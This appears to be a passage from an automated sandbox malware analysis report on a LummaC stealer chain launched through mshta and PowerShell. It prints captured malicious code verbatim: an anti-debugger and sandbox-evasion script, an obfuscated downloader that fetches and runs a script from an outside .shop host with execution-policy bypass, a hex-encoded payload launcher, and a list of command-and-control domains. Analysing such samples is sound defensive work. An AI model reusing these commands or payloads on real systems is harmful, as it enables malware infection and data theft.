Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^QIEX-QZZD%B(_DYT~PDTXBK3F.JQ86R1ZW(PE5IEJN@OUOSH1@NC/A-;GAXYC/M75H"SV)VUU91}C#2H\KQ;J4LFM0WRYK:GO\/L{IX37351521863506478298354615FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME)\|MEMBER\|WHERE-OBJECT{$_.NAME-LIKE''TOMD''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME).PSOBJECT.METHODS\|WHERE-OBJECT{$_.NAME-LIKE''OME''}).NAME).INVOKE(''N-O'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE\|MEMBER)\|WHERE-OBJECT{$_.NAME-LIKE''NL*G''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'\|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;XR
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNSC.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OLLYDBG.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: REGMON.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AUTORUNS.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PETOOLS.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINDUMP.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FUNCTION CHECKPROCESS ($A){IF (GWMI WIN32_PROCESS \| WHERE {$_.NAME -EQ $A}){EXIT}};FUNCTION CHECKNAME($A){IF($A -EQ $ENV:USERNAME){EXIT}};$A1 = "IDAQ.EXE","IDAQ64.EXE","AUTORUNS.EXE","DUMPCAP.EXE","DE4DOT.EXE","HOOKEXPLORER.EXE","ILSPY.EXE","LORDPE.EXE","DNSPY.EXE","PETOOLS.EXE","AUTORUNSC.EXE","RESOURCEHACKER.EXE","FILEMON.EXE","REGMON.EXE","PROCEXP.EXE","PROCEXP64.EXE","TCPVIEW.EXE","TCPVIEW64.EXE","PROCMON.EXE","PROCMON64.EXE","VMMAP.EXE""VMMAP64.EXE","PORTMON.EXE","PROCESSLASSO.EXE","WIRESHARK.EXE","FIDDLER EVERYWHERE.EXE","FIDDLER.EXE","IDA.EXE","IDA64.EXE","IMMUNITYDEBUGGER.EXE","WINDUMP.EXE","X64DBG.EXE","X32DBG.EXE","OLLYDBG.EXE","PROCESSHACKER.EXE";$A2 = "ANONYMOUS", "ANDY","COMPUTERNAME","CUCKOO","NMSDBOX","XXXX-OX","CWSX","WILBERT-SC","XPAMAST-SC""SANDBOX","7SILVIA","HAL9TH","HANSPETER-PC","JOHN-PC","MUELLER-PC","WIN7-TRAPS","FORTINET","TEQUILABOOMBOOM";FOREACH ($I IN $A1 ){CHECKPROCESS($I);}FOREACH($I IN $A2 ){CHECKNAME($I);};START-PROCESS "C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE" -WINDOWSTYLE HIDDEN -ARGUMENTLIST '-W','HIDDEN','-EP','BYPASS','-NOP','-COMMAND','GDR -;SET-VARIABLE CIU (.$EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME)\|MEMBER\|WHERE-OBJECT{$_.NAME-LIKE''TOMD''}).NAME).INVOKE($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME).(($EXECUTIONCONTEXT.(($EXECUTIONCONTEXT\|MEMBER)[6].NAME).PSOBJECT.METHODS\|WHERE-OBJECT{$_.NAME-LIKE''OME''}).NAME).INVOKE(''N-O'',$TRUE,$TRUE),[MANAGEMENT.AUTOMATION.COMMANDTYPES]::CMDLET)NET.WEBCLIENT);SET-ITEM VARIABLE:/LW ''HTTPS://DEDUHKO.KLIPZYROLOO.SHOP/MAZKK.EML'';[SCRIPTBLOCK]::CREATE((GI VARIABLE:CIU).VALUE.((((GI VARIABLE:CIU).VALUE\|MEMBER)\|WHERE-OBJECT{$_.NAME-LIKE''NLG''}).NAME).INVOKE((VARIABLE LW).VALUE)).INVOKERETURNASIS()';$XVHU = $ENV:APPDATA;FUNCTION RGRUS($KTGA, $XIIU){[IO.FILE]::WRITEALLBYTES($XIIU, (NEW-OBJECT (CQTEX $IONU.SUBSTRING(103,26))).DOWNLOADDATA($KTGA))};FUNCTION CQTEX($JWDQL){RETURN (($JWDQL -SPLIT '(?<=\G..)'\|%{$IONU.SUBSTRING(3,100)[$_]}) -JOIN '' -REPLACE ".$")}FUNCTION JWDQL(){FUNCTION WEQQ($OXSST){IF(!(TEST-PATH -PATH $XIIU)){RGRUS (CQTEX $OXSST) $XIIU}}}JWDQL;\|.6
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: IDAQ.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WIRESHARK.EXE
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: FILEMON.EXE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5366	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3830	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6089	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3512	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4488	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2828	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2912	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000002.00000002.1786442355.00000000085F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPCQ
Source: powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: mshta.exe, 00000000.00000003.1789725944.0000000000835000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.1784148239.00000000074F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000000A.00000002.2890844747.000000000076C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1785844346.0000000008538000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2542794546.0000000006D74000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

API call chain: ExitProcess graph end node

graph_10-14141

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 10_2_003ADCD0 LdrInitializeThunk,

10_2_003ADCD0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 370000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: powershell.exe, 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmp	String found in binary or memory: imbibelubmbe.click

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('c3a33c52a21c41b9f45dd91b9a3bf30cf2ec6edd823c9cece83ad45776a5b6cca18208e15a52df5b7f83353d6e23bd618f30020318aa0658a8b9202e85f786765caab181b34d40f3e1afbb439a24557ca57621a37bd3fd396effd4a447891c80c3a87a883d5313addb72306d4184811757153e08edd2ef4becf037797b4b79f777c6223cc775bc4b03cc115c23ad1596e113a7f8e74eb4eec5e6d17a73f590bca9be30fe8de26e4f3f386bc2b0df4c8b789f385d01cc9deefe7ffe963cad5b715105e46717c1f8ca599aac7c726247b67b2ef008d6815624c48d8921d6c026c2d761b3c73420e46d41eb38b2be6dc3a6e728398be20df964e092c95fff64376795c2eb65f33ec3620d837926668055a522e8a88ac3164b0ffa0fe44948e6327c8e69269e914364f60006f48eb7a2f9830777b3c6bc5165322ac78640320b0b34d2aa9c9ef97d71caf1be1edd212144c4e5eda5048bffd67a1dae7b36d7277064edf983455e52e8a0a77bcef0fa38ab0c8d4ea1fca20a03b622cfd25f156452a918d62ccd80d0060df532d92d537f9e1ecc41864005c3c9e067c14930765854957efb5e71dda020e9c8287b2f961f0bdc387138260abc45fb51ea8ae2b650d5b9c6e9c5687580b83cc67faabc67d590702c85406ab842938c6700bdee21992168619bea16916fb865dc5f6df6d9f4f1b2cca2d2bf385a560e8f04c765355464b3f06bdd88ea77e44a2d1776f2b6cd01864cfee829fb17a5e70d006d79c119dc5f57a9a25aa984aa5b1704215ffbc39398a42cb74f3594aa3d56dae65b45e14cc7b4611364ce10e2a98948a4408130f9c618d3f505b018949f27c940b9058868e152dd2a4787f24ad17bf0a1f6bf9df717f3bfd33dc5a1972c3919f13aee4cb268c7dc3f54cf3ac0ee2ba15d2c8d82c9a8c7b8b2a0fd03b7aa09ea4f38e2b6fd1c519eacedae21d18fb3b6cbb0a3cd5570de3f6c90d36eaa1e063743143eba60b985de8361c93ec0d22bcad34d88804a5c111c47c68ee0d30ac9c64f3ae88ba57295f333c3b513e91ef96441c281655217ba1de5c3fdec2419e6ddac538710d679ff0df83b2ebe940e136711ed6c3c0fbfad98c9cd7fceeb3415207acaaa8f091cdd9d584db90bd37d6e6aa2be9e6344e6c4a74a99dbc82a78e28f9aaba7bab79ef7ecd2ec5397e326870a7a51e0d74d954c0215e1baa229e0816aabbcb00a25173c21e313511b1c978fd55355adfbf4e15ebd0a9b52c25e32ea220c9d9dbacd18ee9ceec99257188138d0abbd29c4dffc9b960a9cec94df767700576a1ef94d8b5f25088c95cb11f2ac671514479e6568df04f03553a9607589926aabeedce4449e803e102f7e84665c1edbe23e8c0d5dfab8c81bc5277aaaa134c26cd84c912045fee79030eaf24569738bdc109fe8349634563c2f5ee96e70c6932af1ab2c27f468aa44a2b4e2abebb52f245ab3e0b51a5d301366672fe9f491d4f1038b32f46286f25d8d40248a896053e14be3da4565ab47483a26ab50d34af15bfc76980b08272d58f9cab8f88e13142e13805c1eca94d3c7934eab6a74c1baa74cd734574037b043e95c8086cfe97d42c4b9a7f1c21bc9fe6ffec1daf361c9a765c5c0a9e41d0d9fde014881d03d024f34a7ebc93790f2b789b1d7f8af2755f7862a0e0238a32a772d6a2732b3095daad4eb0e7d9915b8cb5b83c7fd80951d9638ef55a6375a4b0a1a6a39486bd42703740d4739f14c284bad645b7aead8ac307e2b9086d4067f09951fb60accfb3c645ef7029257e657db2c75969e04cea94922cba886ee7fb2c5094b35b47b3e5a6d070e4c8f6bff03bf56a6b5e69db983ec5ac0059a752a08b6681bbf75be4896545506145ace95dffdbf434e62e3ea18a82fb864dbaaf7024875dfaad3455165f3e298c179e9c1bb64e557e51b265c18627c5213911a94a996ded9faf3d
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -;set-variable ciu (.$executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name)\|member\|where-object{$_.name-like'tomd'}).name).invoke($executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name).psobject.methods\|where-object{$_.name-like'ome'}).name).invoke('n-o',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value\|member)\|where-object{$_.name-like'nlg'}).name).invoke((variable lw).value)).invokereturnasis()
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function frszn($zlkrb){return -split ($zlkrb -replace '..', '0x$& ')};$vuqbu = frszn('c3a33c52a21c41b9f45dd91b9a3bf30cf2ec6edd823c9cece83ad45776a5b6cca18208e15a52df5b7f83353d6e23bd618f30020318aa0658a8b9202e85f786765caab181b34d40f3e1afbb439a24557ca57621a37bd3fd396effd4a447891c80c3a87a883d5313addb72306d4184811757153e08edd2ef4becf037797b4b79f777c6223cc775bc4b03cc115c23ad1596e113a7f8e74eb4eec5e6d17a73f590bca9be30fe8de26e4f3f386bc2b0df4c8b789f385d01cc9deefe7ffe963cad5b715105e46717c1f8ca599aac7c726247b67b2ef008d6815624c48d8921d6c026c2d761b3c73420e46d41eb38b2be6dc3a6e728398be20df964e092c95fff64376795c2eb65f33ec3620d837926668055a522e8a88ac3164b0ffa0fe44948e6327c8e69269e914364f60006f48eb7a2f9830777b3c6bc5165322ac78640320b0b34d2aa9c9ef97d71caf1be1edd212144c4e5eda5048bffd67a1dae7b36d7277064edf983455e52e8a0a77bcef0fa38ab0c8d4ea1fca20a03b622cfd25f156452a918d62ccd80d0060df532d92d537f9e1ecc41864005c3c9e067c14930765854957efb5e71dda020e9c8287b2f961f0bdc387138260abc45fb51ea8ae2b650d5b9c6e9c5687580b83cc67faabc67d590702c85406ab842938c6700bdee21992168619bea16916fb865dc5f6df6d9f4f1b2cca2d2bf385a560e8f04c765355464b3f06bdd88ea77e44a2d1776f2b6cd01864cfee829fb17a5e70d006d79c119dc5f57a9a25aa984aa5b1704215ffbc39398a42cb74f3594aa3d56dae65b45e14cc7b4611364ce10e2a98948a4408130f9c618d3f505b018949f27c940b9058868e152dd2a4787f24ad17bf0a1f6bf9df717f3bfd33dc5a1972c3919f13aee4cb268c7dc3f54cf3ac0ee2ba15d2c8d82c9a8c7b8b2a0fd03b7aa09ea4f38e2b6fd1c519eacedae21d18fb3b6cbb0a3cd5570de3f6c90d36eaa1e063743143eba60b985de8361c93ec0d22bcad34d88804a5c111c47c68ee0d30ac9c64f3ae88ba57295f333c3b513e91ef96441c281655217ba1de5c3fdec2419e6ddac538710d679ff0df83b2ebe940e136711ed6c3c0fbfad98c9cd7fceeb3415207acaaa8f091cdd9d584db90bd37d6e6aa2be9e6344e6c4a74a99dbc82a78e28f9aaba7bab79ef7ecd2ec5397e326870a7a51e0d74d954c0215e1baa229e0816aabbcb00a25173c21e313511b1c978fd55355adfbf4e15ebd0a9b52c25e32ea220c9d9dbacd18ee9ceec99257188138d0abbd29c4dffc9b960a9cec94df767700576a1ef94d8b5f25088c95cb11f2ac671514479e6568df04f03553a9607589926aabeedce4449e803e102f7e84665c1edbe23e8c0d5dfab8c81bc5277aaaa134c26cd84c912045fee79030eaf24569738bdc109fe8349634563c2f5ee96e70c6932af1ab2c27f468aa44a2b4e2abebb52f245ab3e0b51a5d301366672fe9f491d4f1038b32f46286f25d8d40248a896053e14be3da4565ab47483a26ab50d34af15bfc76980b08272d58f9cab8f88e13